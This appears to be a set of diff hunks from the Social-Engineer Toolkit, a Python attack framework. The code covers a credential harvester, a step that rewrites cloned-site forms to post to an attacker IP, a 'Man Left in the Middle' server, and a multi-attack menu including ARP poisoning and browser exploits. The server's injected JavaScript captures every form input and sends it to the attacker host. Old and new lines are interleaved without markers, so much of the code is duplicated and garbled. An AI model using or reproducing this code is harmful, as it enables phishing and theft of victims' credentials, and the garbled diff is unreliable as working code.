line2=line2.replace("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter=1
filewrite.write(line2)
opentag = True
for line3 in site_template:
match3=re.search("PARAM:", line3)
if match3:
xml=line3.replace("PARAM: ", "")
xml=xml.rstrip()
filewrite.write(line3+"<br>")
if opentag:
filewrite2.write(r" <url>")
opentag = False
filewrite2.write(r" <param>%s</param>" % (xml) + "\n")
match4=re.search("BREAKHERE", line3)
if match4:
filewrite2.write(" </url>" + "\n")
opentag = True
filewrite.write("<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
# look for how many people visited the website
match5=re.search("VISITORSHERE", line2)
if match5:
if os.path.isfile("%s/src/program_junk/visits.file" % (definepath)):
fileopen3=file("%s/src/program_junk/visits.file" % (definepath), "r")
counter5=0
for line in fileopen3:
if line != "":
line=line.rstrip()
counter5 = counter5+1
if line == "": counter5 = 0
if not os.path.isfile("%s/src/program_junk/visits.file" % (definepath)):
counter5 = 0
# look for how many people visited the website
match5=re.search("VISITORSHERE", line2)
if match5:
if os.path.isfile("%s/src/program_junk/visits.file" % (definepath)):
fileopen3=file("%s/src/program_junk/visits.file" % (definepath), "r")
counter5=0
for line in fileopen3:
if line != "":
line=line.rstrip()
counter5 = counter5+1
if line == "": counter5 = 0
if not os.path.isfile("%s/src/program_junk/visits.file" % (definepath)):
counter5 = 0
line2=line2.replace("VISITORSHERE", str(counter5), 2)
counter = 1
#filewrite.write(line2)
line2=line2.replace("VISITORSHERE", str(counter5), 2)
counter = 1
#filewrite.write(line2)
match6=re.search("BITESHERE", line2)
if match6:
if os.path.isfile("%s/src/program_junk/bites.file" % (definepath)):
fileopen4=file("%s/src/program_junk/bites.file" % (definepath), "r")
counter5 = 0
for line in fileopen4:
line=line.rstrip()
counter5 = counter5+1
if not os.path.isfile("%s/src/program_junk/bites.file" % (definepath)):
counter5=0
match6=re.search("BITESHERE", line2)
if match6:
if os.path.isfile("%s/src/program_junk/bites.file" % (definepath)):
fileopen4=file("%s/src/program_junk/bites.file" % (definepath), "r")
counter5 = 0
for line in fileopen4:
line=line.rstrip()
counter5 = counter5+1
if not os.path.isfile("%s/src/program_junk/bites.file" % (definepath)):
counter5=0
line2=line2.replace("BITESHERE", str(counter5))
counter = 1
filewrite.write(line2)
line2=line2.replace("BITESHERE", str(counter5))
counter = 1
filewrite.write(line2)
if counter == 0:
filewrite.write(line2)
if counter == 0:
filewrite.write(line2)
try:
filewrite.close()
filewrite2.write(r"</harvester>" + "\n")
filewrite2.close()
filewrite.close()
filewrite2.write(r"</harvester>" + "\n")
filewrite2.close()
except: pass
subprocess.Popen("cp -rf %s/src/core/reports/files reports/" % (definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()


@ -6,7 +6,7 @@ import re
import subprocess
import urlparse
import shutil
from src.core.setcore import *
from src.core.setcore import *
#
@ -15,10 +15,10 @@ from src.core.setcore import *
# grab ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
# set the multiattack tabnabbing/webjacking flag
multi_tabnabbing="off"
@ -49,7 +49,7 @@ apache_mode = check_config("APACHE_SERVER=").lower()
track_user = check_config("TRACK_EMAIL_ADDRESSES=").lower()
if track_user == "on":
apache_mode = "on"
apache_mode = "on"
apache_rewrite = ""
# if we are turned on, change this
@ -68,17 +68,17 @@ for line in fileopen:
method_post=re.search("method=post", line, flags=re.IGNORECASE)
if match or method_post:
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
if ssl_flag == 'false':
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if ssl_flag == 'true':
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
@ -90,4 +90,4 @@ filewrite.close()
# move our newly created website with our post stuff to our cloned area
if os.path.isfile("src/program_junk/web_clone/index.html.new"):
shutil.move("src/program_junk/web_clone/index.html.new", "src/program_junk/web_clone/%s" % (site))
shutil.move("src/program_junk/web_clone/index.html.new", "src/program_junk/web_clone/%s" % (site))


@ -28,4 +28,4 @@ Is this correct: yes
subprocess.Popen("cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)"
except:
pass
pass


@ -34,11 +34,11 @@ from src.core import setcore
fileopen=file("config/set_config" , "r").readlines()
counter=0
for line in fileopen:
line=line.rstrip()
match=re.search("MLITM_PORT=", line)
if match:
port=line.replace("MLITM_PORT=", "")
counter=1
line=line.rstrip()
match=re.search("MLITM_PORT=", line)
if match:
port=line.replace("MLITM_PORT=", "")
counter=1
# if nada default port 80
if counter == 0: web_port=8000
@ -51,161 +51,161 @@ reports = "./reports"
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
if re.search("^https?:\/\/(:?localhost|127)", self.headers["Referer"]) is None:
if self.path == '/':
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
print '[-] Grabbing payload from %s' % self.headers["Referer"]
self.prep_payload()
self.wfile.write(self.send_payload())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path[0:11] == '/spacer.gif':
print '[*] Receiving data from %s' % self.client_address[0]
self.referer_host = self.headers["Referer"].replace("https://","").replace("http://","")
self.referer_host = self.referer_host.split("/")[0].split(".")
self.referer_host = self.referer_host[-2]+"."+self.referer_host[-1]
print self.referer_host
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
self.capture()
else:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
except KeyError:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
def do_GET(self):
def send_payload(self):
return self.payload
def prep_payload(self):
js_payload = {}
js_payload[0] = """
function func() {
document.getElementsByTagName('body')[0].innerHTML = \""""
js_payload[2] = """\";
var formslength =document.getElementsByTagName('form').length;
for(var i=0; i<formslength; i++){
document.forms[i].setAttribute('onsubmit', 'myOnSubmit('+i+')');
}
try:
if re.search("^https?:\/\/(:?localhost|127)", self.headers["Referer"]) is None:
if self.path == '/':
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
print '[-] Grabbing payload from %s' % self.headers["Referer"]
self.prep_payload()
self.wfile.write(self.send_payload())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path[0:11] == '/spacer.gif':
print '[*] Receiving data from %s' % self.client_address[0]
self.referer_host = self.headers["Referer"].replace("https://","").replace("http://","")
self.referer_host = self.referer_host.split("/")[0].split(".")
self.referer_host = self.referer_host[-2]+"."+self.referer_host[-1]
print self.referer_host
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
self.capture()
else:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
except KeyError:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
def send_payload(self):
return self.payload
def prep_payload(self):
js_payload = {}
js_payload[0] = """
function func() {
document.getElementsByTagName('body')[0].innerHTML = \""""
js_payload[2] = """\";
var formslength =document.getElementsByTagName('form').length;
for(var i=0; i<formslength; i++){
document.forms[i].setAttribute('onsubmit', 'myOnSubmit('+i+')');
}
function myOnSubmit(form) {
data = \"\";
for (i=0; i < document.forms[form].getElementsByTagName(\"input\").length; i++){
data = data+document.forms[form].getElementsByTagName(\"input\")[i].name+\"=\"+document.forms[form].getElementsByTagName(\"input\")[i].value+\"&\";
}
var img = document.createElement('img');
img.src = \""""
js_payload[4] = """?\"+data+\"\";
img.setAttribute('width', '100%');
img.setAttribute('height', '100%');
document.getElementsByTagName('body')[0].appendChild(img);
pause(500);
return true;
}
function pause(milsec){
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < milsec);
}
func();
document.execCommand('Stop');
"""
js_payload[1] = str(self.served())
js_payload[1] = js_payload[1].replace("\"","\\\"")
js_payload[3] = "http://"+self.headers["host"]+"/spacer.gif"
full_payload = ""
js_payload[1] = js_payload[1].replace("\t","").replace("\n","").replace("\r","")
for i in js_payload:
full_payload += str(js_payload[i])
self.payload = full_payload
def served(self):
t = urllib2.urlopen(self.headers["Referer"])
html = t.read()
soup = BeautifulSoup.BeautifulSoup(html)
body = soup.find(["body"])
return body
}
def capture(self):
self.generated_on = str(datetime.datetime.now())
self.path = self.path.split("?")[1].split(" ")[0]
dict = urlparse.parse_qs(self.path)
meta = {}
meta['ip'] = self.client_address
meta['browser'] = [self.headers["User-Agent"]]
meta['referer'] = [self.headers["Referer"]]
print "[+] Generating XML.."
root = Element('XSS')
root.set('version', '1.0')
request = SubElement(root, 'request')
site = SubElement(request, 'site')
site.text = self.address_string()
date = SubElement(request, 'date')
date.text = self.generated_on
requestLine = SubElement(request, 'requestLine')
requestLine.text = self.requestline
metaData = SubElement(request, 'meta')
for key, value in meta.iteritems():
ele = SubElement(metaData, key)
ele.text = value[0]
formData = SubElement(request, 'formData')
print '[*] Data received:'
for key, value in dict.iteritems():
if key == "":
key = "UNDEFINED"
print '[-] \t '+ str(key)+' => '+str(value)
ele = SubElement(formData, key)
ele.text = value[0]
self.log_data(self.prettify(root))
function myOnSubmit(form) {
data = \"\";
for (i=0; i < document.forms[form].getElementsByTagName(\"input\").length; i++){
data = data+document.forms[form].getElementsByTagName(\"input\")[i].name+\"=\"+document.forms[form].getElementsByTagName(\"input\")[i].value+\"&\";
}
var img = document.createElement('img');
img.src = \""""
js_payload[4] = """?\"+data+\"\";
img.setAttribute('width', '100%');
img.setAttribute('height', '100%');
document.getElementsByTagName('body')[0].appendChild(img);
pause(500);
return true;
}
function pause(milsec){
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < milsec);
}
func();
document.execCommand('Stop');
"""
js_payload[1] = str(self.served())
js_payload[1] = js_payload[1].replace("\"","\\\"")
js_payload[3] = "http://"+self.headers["host"]+"/spacer.gif"
full_payload = ""
js_payload[1] = js_payload[1].replace("\t","").replace("\n","").replace("\r","")
for i in js_payload:
full_payload += str(js_payload[i])
self.payload = full_payload
def served(self):
t = urllib2.urlopen(self.headers["Referer"])
html = t.read()
soup = BeautifulSoup.BeautifulSoup(html)
body = soup.find(["body"])
return body
def capture(self):
self.generated_on = str(datetime.datetime.now())
self.path = self.path.split("?")[1].split(" ")[0]
dict = urlparse.parse_qs(self.path)
meta = {}
meta['ip'] = self.client_address
meta['browser'] = [self.headers["User-Agent"]]
meta['referer'] = [self.headers["Referer"]]
print "[+] Generating XML.."
root = Element('XSS')
root.set('version', '1.0')
request = SubElement(root, 'request')
site = SubElement(request, 'site')
site.text = self.address_string()
date = SubElement(request, 'date')
date.text = self.generated_on
requestLine = SubElement(request, 'requestLine')
requestLine.text = self.requestline
metaData = SubElement(request, 'meta')
for key, value in meta.iteritems():
ele = SubElement(metaData, key)
ele.text = value[0]
def prettify(self,elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ElementTree.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
formData = SubElement(request, 'formData')
def log_data(self,data):
report = open(reports+"/"+self.referer_host+"_"+self.generated_on.replace(" ","_").replace(":",".")+".xml","w+")
report.write(data)
report.close
print '[*] Data received:'
for key, value in dict.iteritems():
if key == "":
key = "UNDEFINED"
print '[-] \t '+ str(key)+' => '+str(value)
ele = SubElement(formData, key)
ele.text = value[0]
self.log_data(self.prettify(root))
def prettify(self,elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ElementTree.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
def log_data(self,data):
report = open(reports+"/"+self.referer_host+"_"+self.generated_on.replace(" ","_").replace(":",".")+".xml","w+")
report.write(data)
report.close
print setcore.bcolors.BLUE + "\n***************************************************"
@ -214,10 +214,9 @@ print setcore.bcolors.BLUE + "**************************************************
print setcore.bcolors.BLUE + "Man Left in the Middle Attack brought to you by:\nKyle Osborn - kyle@kyleosborn.com" + setcore.bcolors.ENDC
print "\nStarting server on %s:%s..." % (bind,port)
try:
serv = HTTPServer((bind, int(port)), RequestHandler)
print setcore.bcolors.GREEN + "[*] Server has started" + setcore.bcolors.ENDC
serv.serve_forever()
serv = HTTPServer((bind, int(port)), RequestHandler)
print setcore.bcolors.GREEN + "[*] Server has started" + setcore.bcolors.ENDC
serv.serve_forever()
except Exception, e:
print e
print "Failed to start webserver.\n\nMake sure you have the permissions to bind on %s:%s" % (bind,port)
print e
print "Failed to start webserver.\n\nMake sure you have the permissions to bind on %s:%s" % (bind,port)

View file

@ -34,17 +34,17 @@ webjacking="off"
# turning flag on
def flag_on(vector):
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
# turning flag off
def flag_off(vector):
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.RED + "OFF" + bcolors.ENDC)
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.RED + "OFF" + bcolors.ENDC)
# filewriting
def write_file(filename,results):
filewrite=file("src/program_junk/%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
filewrite=file("src/program_junk/%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
# specify attackvector
filewrite=file("src/program_junk/attack_vector","w")
@ -73,13 +73,13 @@ clonedurl = 0
fileopen = file("%s/src/program_junk/site.template" % (definepath), "r")
data = fileopen.read()
if "TEMPLATE=SELF" in data:
clonedurl = 1
clonedurl = 1
# clean up cloner directory
if clonedurl == 0:
subprocess.Popen("rm -rf src/program_junk/web_clone;mkdir src/program_junk/web_clone/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("rm -rf src/program_junk/web_clone;mkdir src/program_junk/web_clone/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants
# set a quick loop to see what the user wants
a=1
print ("""
@ -91,219 +91,219 @@ print ("""
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'I'm finished' option.""")
print("""\nSelect which attacks you want to use:
""")
while a==1:
trigger=""
print " 1. Java Applet Attack Method" + toggleflag_java
print " 2. Metasploit Browser Exploit Method" + toggleflag_meta
print " 3. Credential Harvester Attack Method" + toggleflag_harv
print " 4. Tabnabbing Attack Method" + toggleflag_tabnab
print " 5. Man Left in the Middle Attack Method" + toggleflag_mlitm
print " 6. Web Jacking Attack Method" + toggleflag_webjacking
print " 7. Use them all - A.K.A. 'Tactical Nuke'"
print " 8. I'm finished and want to proceed with the attack"
print "\n 99. Return to Main Menu\n"
trigger=""
print " 1. Java Applet Attack Method" + toggleflag_java
print " 2. Metasploit Browser Exploit Method" + toggleflag_meta
print " 3. Credential Harvester Attack Method" + toggleflag_harv
print " 4. Tabnabbing Attack Method" + toggleflag_tabnab
print " 5. Man Left in the Middle Attack Method" + toggleflag_mlitm
print " 6. Web Jacking Attack Method" + toggleflag_webjacking
print " 7. Use them all - A.K.A. 'Tactical Nuke'"
print " 8. I'm finished and want to proceed with the attack"
print "\n 99. Return to Main Menu\n"
profile=raw_input(setprompt(["2","16"], "Enter selections one at a time (8 to finish)"))
profile=raw_input(setprompt(["2","16"], "Enter selections one at a time (8 to finish)"))
if profile == "": profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will trigger invalid option
try: # this will trigger an error if it isnt an integer
profile=int(profile)
# convert it back
profile=str(profile)
# if it triggers an exception reassign profile to option 8
except: profile = "10"
if profile == "": profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will trigger invalid option
try: # this will trigger an error if it isnt an integer
profile=int(profile)
# convert it back
profile=str(profile)
# if it triggers an exception reassign profile to option 8
except: profile = "10"
# if you want to return to main menu
if profile == "99":
break
# if you want to return to main menu
if profile == "99":
break
# trigger invalid option
if int(profile) >= 10:
raw_input("\nInvalid option..")
return_continue()
# trigger invalid option
if int(profile) >= 10:
raw_input("\nInvalid option..")
return_continue()
if profile == "7":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
(: :)
':._ _.:'
| |
(=====)
| |
| |
| |
((/ \))""") + bcolors.ENDC
if profile == "7":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
(: :)
':._ _.:'
| |
(=====)
| |
| |
| |
((/ \))""") + bcolors.ENDC
print "\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?"
print "\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n"
java_applet="on"
meta_attack="on"
harvester="on"
break
print "\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?"
print "\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n"
java_applet="on"
meta_attack="on"
harvester="on"
break
if profile == "8":
break
if profile == "8":
break
# java applet on/off
if profile == "1":
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet="on"
trigger=1
#toggle_flags here
toggleflag_java=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
# java applet on/off
if profile == "1":
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet="on"
trigger=1
#toggle_flags here
toggleflag_java=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet="off"
# toggle flags here
toggleflag_java=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet="off"
# toggle flags here
toggleflag_java=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack=="off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack="on"
trigger=1
# toggle flags here
toggleflag_meta=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack=="off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack="on"
trigger=1
# toggle flags here
toggleflag_meta=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if meta_attack=="on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack="off"
# toggle flags here
toggleflag_meta=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if meta_attack=="on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack="off"
# toggle flags here
toggleflag_meta=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester="on"
trigger=1
# toggle flags here
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester="on"
trigger=1
# toggle flags here
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester="off"
# toggle flags here
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester="off"
# toggle flags here
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing="on"
trigger=1
harvester="on"
# toggle flags here
toggleflag_tabnab=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
print webjacking
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing="on"
trigger=1
harvester="on"
# toggle flags here
toggleflag_tabnab=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
print webjacking
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing="off"
harvester="off"
# toggle flags here
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing="off"
harvester="off"
# toggle flags here
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# turn man left in the middle to on
if profile== "5":
# turn man left in the middle to on
if profile== "5":
if mlitm == "off":
flag_on("Man Left in the Middle")
mlitm="on"
return_menu()
trigger=1
if harvester == "on" or tabnabbing == "on":
print "[*] You cannot use MLITM and Harvester/Tabnabbing in the same attack!"
print "[*] Disabling Harvesting and/or Tabnabbing"
harvester="off"
tabnabbing="off"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)"+ bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if mlitm == "off":
flag_on("Man Left in the Middle")
mlitm="on"
return_menu()
trigger=1
if harvester == "on" or tabnabbing == "on":
print "[*] You cannot use MLITM and Harvester/Tabnabbing in the same attack!"
print "[*] Disabling Harvesting and/or Tabnabbing"
harvester="off"
tabnabbing="off"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)"+ bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if mlitm == "on":
if trigger != 1:
flag_off("Man Left in the Middle")
return_menu()
mlitm="off"
# toggle flags here
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if mlitm == "on":
if trigger != 1:
flag_off("Man Left in the Middle")
return_menu()
mlitm="off"
# toggle flags here
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# turn webjacking on
if profile== "6":
# turn webjacking on
if profile== "6":
if webjacking == "off":
flag_on("Web Jacking")
webjacking="on"
return_menu()
trigger=1
if tabnabbing == "on" or mlitm == "on":
print "[*] You cannot use MLITM and Tabnabbing in the same attack!"
print "[*] Disabling MLITM and/or Tabnabbing"
mlitm="off"
tabnabbing="off"
harvester="on"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if harvester == "off":
harvester="on"
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_webjacking=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if webjacking == "off":
flag_on("Web Jacking")
webjacking="on"
return_menu()
trigger=1
if tabnabbing == "on" or mlitm == "on":
print "[*] You cannot use MLITM and Tabnabbing in the same attack!"
print "[*] Disabling MLITM and/or Tabnabbing"
mlitm="off"
tabnabbing="off"
harvester="on"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if harvester == "off":
harvester="on"
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_webjacking=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking="off"
# toggle flags here
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking="off"
# toggle flags here
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# next series of flags needed
@ -311,114 +311,114 @@ payloadgen=0
# write handler files for detection
if java_applet == "on":
write_file("multi_java","multiattack=java_on")
write_file("multi_java","multiattack=java_on")
if meta_attack == "on":
write_file("multi_meta","multiattack=meta_on")
write_file("multi_meta","multiattack=meta_on")
if tabnabbing == "on":
write_file("multi_tabnabbing","multiattack=tabnabbing_on")
write_file("multi_tabnabbing","multiattack=tabnabbing_on")
if harvester == "on":
write_file("multi_harvester","multiattack=harvester_on")
write_file("multi_harvester","multiattack=harvester_on")
if mlitm == "on":
write_file("multi_mlitm","multiattack=mlitm_on")
write_file("multi_mlitm","multiattack=mlitm_on")
if webjacking == "on":
write_file("multi_webjacking","multiattack=webjacking_on")
write_file("multi_webjacking","multiattack=webjacking_on")
# hit cloner flag
# if any of the flags are turned on, then trigger to see if ARP Cache needs to be enabled
if java_applet =="on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me,"importing 'src.webattack.web_clone.cloner'",1)
try: reload(cloner)
except: import cloner
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me,"importing 'src.webattack.web_clone.cloner'",1)
try: reload(cloner)
except: import cloner
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me,"importing 'src.core.arp_cache.arp'",1)
try: reload(arp)
except: import arp
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me,"importing 'src.core.arp_cache.arp'",1)
try: reload(arp)
except: import arp
# start the stuff for java applet
if java_applet == "on":
sys.path.append("src/core/payloadgen/")
debug_msg(me,"importing 'src.core.payloadgen.create_payloads'",1)
try: reload(create_payloads)
except: import create_payloads
payloadgen=1
# Allow Self-Signed Certificates
fileopen=file("config/set_config", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("SELF_SIGNED_APPLET=ON", line)
if match:
sys.path.append("src/html/unsigned/")
import self_sign
sys.path.append("src/core/payloadgen/")
debug_msg(me,"importing 'src.core.payloadgen.create_payloads'",1)
try: reload(create_payloads)
except: import create_payloads
payloadgen=1
# Allow Self-Signed Certificates
fileopen=file("config/set_config", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("SELF_SIGNED_APPLET=ON", line)
if match:
sys.path.append("src/html/unsigned/")
import self_sign
# start the stuff for metasploit client side
if meta_attack == "on":
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
# this checks to see if the MSF payload uses webdav, if so we have to force port 80
if os.path.isfile("src/program_junk/webdav_enabled"):
webdav_enabled="on"
# this checks to see if the MSF payload uses webdav, if so we have to force port 80
if os.path.isfile("src/program_junk/webdav_enabled"):
webdav_enabled="on"
# set this incase msf attack, java applet, and harvester is needed
pexpect_flag="off"
# start the stuff for harvester
if harvester == "on" or tabnabbing == "on" or webjacking == "on":
if tabnabbing == "on" or webjacking == "on":
# if tabnabbing is on, set th tabnabbing to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me,"importing 'src.webattack.tabnabbing.tabnabbing'",1)
try: reload(tabnabbing)
except: import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag="on"
a=subprocess.Popen("python src/webattack/harvester/harvester.py", shell=True)
if tabnabbing == "on" or webjacking == "on":
# if tabnabbing is on, set th tabnabbing to on
sys.path.append("src/webattack/tabnabbing")
